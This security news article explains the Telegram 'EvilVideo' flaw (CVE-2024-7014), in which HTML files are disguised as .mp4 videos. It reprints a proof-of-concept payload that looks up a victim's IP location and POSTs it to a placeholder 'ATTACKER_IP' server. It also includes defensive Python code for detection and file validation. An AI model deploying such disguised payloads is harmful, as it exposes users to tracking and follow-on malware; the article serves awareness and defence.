Saturday, April 12, 2025
Telegram EvilVideo Vulnerability Exploited to Run Malicious Code on Victims’ Devices

A newly documented exploitation technique targeting Telegram’s file-sharing infrastructure has raised alarms in cybersecurity circles.

Dubbed “EvilVideo,” this attack vector leverages a vulnerability (CVE-2024-7014) in how Telegram processes multimedia content, enabling attackers to disguise malicious HTML files as video files.

When unsuspecting users attempt to open these files, embedded JavaScript code executes, enabling IP logging, device fingerprinting, and secondary payload delivery.

Technical Breakdown of the EvilVideo Exploit

The vulnerability stems from inconsistencies in Telegram’s file-type validation mechanisms. Attackers craft an .htm file containing JavaScript payloads, rename it with an .mp4 extension, and distribute it via Telegram’s API.

When a recipient opens the file, Android’s content provider system parses the URI as content://org.telegram.messenger.provider/media/…, triggering the default browser to render the HTML/JavaScript content rather than a video player.
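Added example, not code from the article or from Cti Monster's report: the content-based check a receiving app or upload gateway could apply to close the extension/content gap described above. It sniffs the leading bytes the way a browser would and rejects a file whose content disagrees with its extension; the sample bytes, the decoy filename reuse and the function names are constructed for this illustration.

```python
import os

# ISO BMFF containers (MP4) carry an 'ftyp' box whose tag sits at byte offset 4.
MP4_FTYP_OFFSET = 4
# Leading markup that a browser will render as HTML regardless of the file's extension.
HTML_MARKERS = (b"<!doctype html", b"<html", b"<head", b"<body", b"<script", b"<iframe")
EXTENSION_TYPES = {".mp4": "mp4", ".htm": "html", ".html": "html"}


def sniff_type(data: bytes) -> str:
    """Classify a blob by its leading bytes, ignoring the filename entirely."""
    head = data[:512]
    if len(head) >= 12 and head[MP4_FTYP_OFFSET:MP4_FTYP_OFFSET + 4] == b"ftyp":
        return "mp4"
    # Mirror browser sniffing: drop a UTF-8 BOM and leading whitespace, compare case-insensitively.
    if head.startswith(b"\xef\xbb\xbf"):
        head = head[3:]
    lowered = head.lstrip().lower()
    if any(marker in lowered for marker in HTML_MARKERS):
        return "html"
    return "unknown"


def validate_upload(filename: str, data: bytes) -> tuple[bool, str]:
    """Accept a file only when its content agrees with what its extension claims."""
    ext = os.path.splitext(filename)[1].lower()
    claimed = EXTENSION_TYPES.get(ext, "unknown")
    actual = sniff_type(data)
    if claimed == "mp4" and actual != "mp4":
        return False, f"{filename}: extension claims mp4 but content sniffs as {actual}"
    if actual == "html" and claimed != "html":
        return False, f"{filename}: active HTML content behind a non-HTML extension"
    return True, f"{filename}: content matches extension ({actual})"


# Constructed samples: a minimal genuine MP4 header, and an HTML payload renamed to .mp4
# using the decoy filename quoted later in the article.
GENUINE_MP4 = b"\x00\x00\x00\x18ftypmp42\x00\x00\x00\x00mp42isom" + b"\x00" * 64
DISGUISED_HTML = (b"<!DOCTYPE html>\n<html><head><script>"
                  b"fetch('http://ip-api.com/json')</script></head><body></body></html>")

if __name__ == "__main__":
    for name, blob in (("clip.mp4", GENUINE_MP4), ("4_5924894289476721732.mp4", DISGUISED_HTML)):
        accepted, reason = validate_upload(name, blob)
        print("ACCEPT" if accepted else "REJECT", reason)
```

A polyglot that carries a valid ftyp box with markup further in would pass this sniffer; it addresses only the plain rename the article describes.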

Weaponized HTML Payload

According to a report by Cti Monster, the malicious HTML employs browser-based scripting to extract sensitive system and network data.

As demonstrated in the proof-of-concept code below, attackers leverage the fetch API to collect IP geolocation details and exfiltrate them to a command-and-control server:

```html
<!DOCTYPE html>
<html>
<head>
    <script>
        // Query a public geolocation API for the viewer's IP, ISP and location...
        fetch('http://ip-api.com/json')
            .then(response => response.json())
            .then(data => {
                // ...then POST the result to the attacker's server (placeholder host and port).
                fetch('http://ATTACKER_IP:5000/log_ip', {
                    method: 'POST',
                    body: JSON.stringify({
                        ip: data.query,
                        isp: data.isp,
                        location: `${data.city}, ${data.country}`
                    })
                });
            });
    </script>
</head>
<body></body>
</html>
```

This script harvests the victim’s public IP address, ISP, and approximate geographical location (city and country), giving attackers reconnaissance data for follow-on attacks.

EvilLoader Module: Enhanced Anti-Analysis Capabilities

Recent updates to the EvilLoader malware-as-a-service (MaaS) platform incorporate sophisticated anti-analysis checks to evade detection. The module now performs:

  • Sandbox Detection: Checks for virtualized environments using RAM, CPU core, and screen-resolution heuristics.
  • Debugger Evasion: Monitors for debugging tools like Frida or Xposed framework.
  • Geofencing: Blocks execution in regions irrelevant to the attacker’s objectives.

These enhancements complicate reverse engineering and allow attackers to deploy secondary payloads—such as fake “Play Protect” warnings—that trick users into disabling security protocols.

Attack Lifecycle and User Impact

  1. Lure Distribution: Attackers send the malicious .htm file via Telegram, masquerading as a video (e.g., 4_5924894289476721732.mp4).
  2. File Execution: The victim attempts to open the file, prompting the browser to render the HTML.
  3. IP Exfiltration: JavaScript collects network data and transmits it to the attacker’s server.
  4. Payload Delivery: Victims are redirected to phishing pages hosting malware downloads disguised as security updates.

Mitigation Strategies

  • User Vigilance: Avoid opening unsolicited “video” files from unknown senders. Verify file extensions before execution.
  • Network Monitoring: Deploy intrusion detection systems (IDS) to flag anomalous outbound traffic to IP geolocation APIs.
  • Developer Action: Telegram must enforce stricter MIME-type validation and implement file-content scanning for API-uploaded media.
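Added example, not part of the article: a correlation rule for the network-monitoring point above, run over a constructed key=value proxy log (the log format, field names and sample addresses are assumptions, not any vendor's output). It flags a client that queries ip-api.com and, within a minute, POSTs to a bare IP literal or a non-standard port, which is the shape of the exfiltration in the payload shown earlier.

```python
import re
from datetime import datetime

# Geolocation API queried by the EvilVideo payload; extend with others used in your environment.
GEOLOCATION_HOSTS = {"ip-api.com"}
WINDOW_SECONDS = 60  # max gap between the lookup and the exfiltration POST we still correlate
# Constructed proxy-log format (not any vendor's): one request per line, key=value fields.
LOG_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) method=(?P<method>\S+) "
                    r"host=(?P<host>\S+) port=(?P<port>\d+) path=(?P<path>\S+)$")
IP_LITERAL = re.compile(r"^\d{1,3}(\.\d{1,3}){3}$")

def parse(line: str):
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["port"] = int(rec["port"])
    return rec

def find_ip_logger_beacons(lines):
    """Return (src, host, port) for each geolocation lookup that the same client follows, within
    WINDOW_SECONDS, by a POST to a bare IP literal or non-standard port (cf. ATTACKER_IP:5000)."""
    last_lookup = {}
    alerts = []
    for rec in filter(None, map(parse, lines)):
        if rec["method"] == "GET" and rec["host"] in GEOLOCATION_HOSTS:
            last_lookup[rec["src"]] = rec["ts"]
            continue
        lookup_ts = last_lookup.get(rec["src"])
        if lookup_ts is None or rec["method"] != "POST":
            continue
        if (rec["ts"] - lookup_ts).total_seconds() > WINDOW_SECONDS:
            continue
        if IP_LITERAL.match(rec["host"]) or rec["port"] not in (80, 443):
            alerts.append((rec["src"], rec["host"], rec["port"]))
    return alerts

# Constructed sample log (203.0.113.0/24 is the documentation range): only 10.0.0.15 should alert.
SAMPLE_LOG = """\
2025-04-12T10:00:01Z src=10.0.0.15 method=GET host=ip-api.com port=80 path=/json
2025-04-12T10:00:02Z src=10.0.0.15 method=POST host=203.0.113.7 port=5000 path=/log_ip
2025-04-12T10:00:05Z src=10.0.0.22 method=GET host=ip-api.com port=80 path=/json
2025-04-12T10:00:06Z src=10.0.0.22 method=GET host=www.example.com port=443 path=/
2025-04-12T10:03:30Z src=10.0.0.22 method=POST host=203.0.113.9 port=5000 path=/log_ip
""".splitlines()

if __name__ == "__main__":
    for src, host, port in find_ip_logger_beacons(SAMPLE_LOG):
        print(f"ALERT {src} -> {host}:{port} shortly after a geolocation lookup")
```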

The EvilVideo exploit underscores the blurred line between file types and execution contexts in modern apps.

As attackers refine content-disguise techniques, users and developers alike must adopt proactive security postures—validating file integrity, updating software regularly, and educating on emerging social engineering tactics.

With CVE-2024-7014 highlighting Telegram’s vulnerability landscape, platform-wide security audits remain imperative to mitigate similar threats.

Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
